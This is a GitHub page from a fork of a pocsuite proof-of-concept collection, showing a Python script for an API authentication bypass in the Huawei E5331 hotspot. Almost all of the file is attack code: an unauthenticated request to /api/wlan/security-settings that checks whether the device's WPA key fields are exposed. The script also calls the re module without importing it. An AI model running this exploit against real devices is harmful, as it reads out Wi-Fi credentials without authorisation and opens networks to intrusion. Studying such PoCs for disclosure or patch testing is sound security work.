forked from njcx/pocsuite_poc_collect
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathHuawei E5331 API验证绕过漏洞.py
executable file
·51 lines (40 loc) · 1.5 KB
/
Huawei E5331 API验证绕过漏洞.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class Huawei_E5331_Unauthorized_access(POCBase):
vulID = '61930' # ssvid
version = '1.0'
author = ['anonymous']
vulDate = '2013-12-06'
createDate = '2015-11-13'
updateDate = '2015-11-13'
references = ['http://www.sebug.net/vuldb/ssvid-61930']
name = 'Huawei E5331 API验证绕过漏洞'
appPowerLink = 'http://www.huawei.com'
appName = 'Huawei E355'
appVersion = 'Software version 21.344.11.00.414'
vulType = 'Unauthorized access'
desc = '''
All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk.
'''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self, verify=True):
result = {}
vul_url = '%s/api/wlan/security-settings' % (self.url)
response = req.get(vul_url).content
if re.search('<WifiWpapsk>', response) and re.search('<WifiWpaencryptionmodes>', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Huawei_E5331_Unauthorized_access)